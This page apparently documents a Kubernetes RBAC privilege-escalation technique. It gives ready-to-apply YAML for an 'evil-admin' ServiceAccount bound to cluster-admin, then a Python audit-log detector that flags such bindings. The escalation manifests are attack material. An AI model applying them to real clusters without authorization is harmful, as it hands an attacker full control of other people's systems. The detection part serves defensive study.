Role-based access control (RBAC) is a key security feature in Kubernetes. RBAC restricts the actions that each identity in the cluster is allowed to perform. cluster-admin is a built-in, highly privileged ClusterRole. An attacker who holds permission to create RoleBindings or ClusterRoleBindings can bind an identity they control to the cluster-admin ClusterRole, or to another highly privileged role, and thereby escalate their privileges.
Create a new ServiceAccount named evil-admin:

```yaml
apiVersion: v1
kind: ServiceAccount
metadata:
  name: evil-admin
  namespace: default
```
Create a new RoleBinding (or ClusterRoleBinding) that binds the evil-admin ServiceAccount to the cluster-admin ClusterRole:

```yaml
kind: RoleBinding
apiVersion: rbac.authorization.k8s.io/v1
metadata:
  name: evil-admin-binding
  namespace: default
subjects:
- kind: ServiceAccount
  name: evil-admin
  namespace: default
roleRef:
  kind: ClusterRole
  name: cluster-admin
  apiGroup: rbac.authorization.k8s.io
```
The evil-admin ServiceAccount now has full control over the default namespace (a ClusterRoleBinding would grant the same rights cluster-wide). This can be confirmed by impersonating the ServiceAccount and listing its permissions:

```
$ kubectl auth can-i -n default --list --as system:serviceaccount:default:evil-admin
Resources   Non-Resource URLs   Resource Names   Verbs
*.*         []                  []               [*]
            [*]                 []               [*]
...
```
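From the defender's side, the binding creation above is visible in the Kubernetes API audit log. The following is an added example (not code from the original page) that scans audit events for successful creation or modification of a RoleBinding or ClusterRoleBinding whose roleRef is a privileged ClusterRole such as cluster-admin, and reports who did it and which subjects gained the role. It assumes the audit policy records the request body (RequestResponse level) so that requestObject is present, and the sample events are constructed for illustration; the PRIVILEGED_ROLES set is an assumed, operator-tunable list seeded with the cluster-admin role named on the page.

```python
import json

# ClusterRoles whose bindings should always be reviewed. "cluster-admin" is the
# built-in role discussed above; an operator would extend this set (assumption).
PRIVILEGED_ROLES = {"cluster-admin"}

# Audit objectRef.resource values for the two binding kinds.
BINDING_RESOURCES = {"rolebindings", "clusterrolebindings"}

# Verbs that can introduce or change a binding's roleRef or subjects.
MUTATING_VERBS = {"create", "update", "patch"}


def subject_id(subject):
    """Render a binding subject the way it appears as an API username."""
    kind = subject.get("kind")
    if kind == "ServiceAccount":
        return f"system:serviceaccount:{subject.get('namespace', '')}:{subject.get('name')}"
    return f"{kind}:{subject.get('name')}"


def find_privileged_bindings(events, privileged_roles=PRIVILEGED_ROLES):
    """Return one finding per successful mutation of a binding to a privileged ClusterRole."""
    findings = []
    for ev in events:
        if ev.get("verb") not in MUTATING_VERBS:
            continue
        ref = ev.get("objectRef") or {}
        if ref.get("resource") not in BINDING_RESOURCES:
            continue
        # Only requests the API server actually accepted changed the cluster state.
        code = (ev.get("responseStatus") or {}).get("code", 0)
        if not 200 <= code < 300:
            continue
        # Requires RequestResponse audit level so the body is recorded (assumption).
        body = ev.get("requestObject") or {}
        role = body.get("roleRef") or {}
        if role.get("kind") != "ClusterRole" or role.get("name") not in privileged_roles:
            continue
        findings.append({
            "actor": (ev.get("user") or {}).get("username"),
            "binding": f"{ref.get('resource')}/{ref.get('name')}",
            "namespace": ref.get("namespace") or "<cluster-wide>",
            "role": role.get("name"),
            "subjects": [subject_id(s) for s in body.get("subjects", [])],
        })
    return findings


def parse_audit_log(text):
    """Parse JSON-lines audit output (one Event per line), skipping blank lines."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]


# Constructed sample audit events: a benign ConfigMap write, the RoleBinding to
# cluster-admin from the walkthrough above, a harmless binding to "view", and a
# rejected (403) ClusterRoleBinding attempt that must not be reported.
SAMPLE_AUDIT_LOG = """
{"kind":"Event","apiVersion":"audit.k8s.io/v1","verb":"create","user":{"username":"dev-user"},"objectRef":{"resource":"configmaps","namespace":"default","name":"app-config"},"responseStatus":{"code":201}}
{"kind":"Event","apiVersion":"audit.k8s.io/v1","verb":"create","user":{"username":"dev-user"},"objectRef":{"resource":"rolebindings","namespace":"default","name":"evil-admin-binding","apiGroup":"rbac.authorization.k8s.io"},"requestObject":{"kind":"RoleBinding","subjects":[{"kind":"ServiceAccount","name":"evil-admin","namespace":"default"}],"roleRef":{"kind":"ClusterRole","name":"cluster-admin","apiGroup":"rbac.authorization.k8s.io"}},"responseStatus":{"code":201}}
{"kind":"Event","apiVersion":"audit.k8s.io/v1","verb":"create","user":{"username":"dev-user"},"objectRef":{"resource":"rolebindings","namespace":"default","name":"readers","apiGroup":"rbac.authorization.k8s.io"},"requestObject":{"kind":"RoleBinding","subjects":[{"kind":"Group","name":"readers"}],"roleRef":{"kind":"ClusterRole","name":"view","apiGroup":"rbac.authorization.k8s.io"}},"responseStatus":{"code":201}}
{"kind":"Event","apiVersion":"audit.k8s.io/v1","verb":"create","user":{"username":"dev-user"},"objectRef":{"resource":"clusterrolebindings","name":"denied-binding","apiGroup":"rbac.authorization.k8s.io"},"requestObject":{"kind":"ClusterRoleBinding","subjects":[{"kind":"User","name":"someone"}],"roleRef":{"kind":"ClusterRole","name":"cluster-admin","apiGroup":"rbac.authorization.k8s.io"}},"responseStatus":{"code":403}}
"""


def scan_sample():
    return find_privileged_bindings(parse_audit_log(SAMPLE_AUDIT_LOG))


if __name__ == "__main__":
    for f in scan_sample():
        print(f"{f['actor']} bound {f['subjects']} to {f['role']} via {f['binding']} in {f['namespace']}")
```

Run against a real audit log the same function applies line by line to the API server's JSON audit output; the RoleBinding in the walkthrough is reported as dev-user granting system:serviceaccount:default:evil-admin the cluster-admin role in the default namespace, while the rejected attempt and the binding to the view role produce no finding. Alerting on this event class catches the technique at the moment the binding is written, before the new ServiceAccount token is ever used.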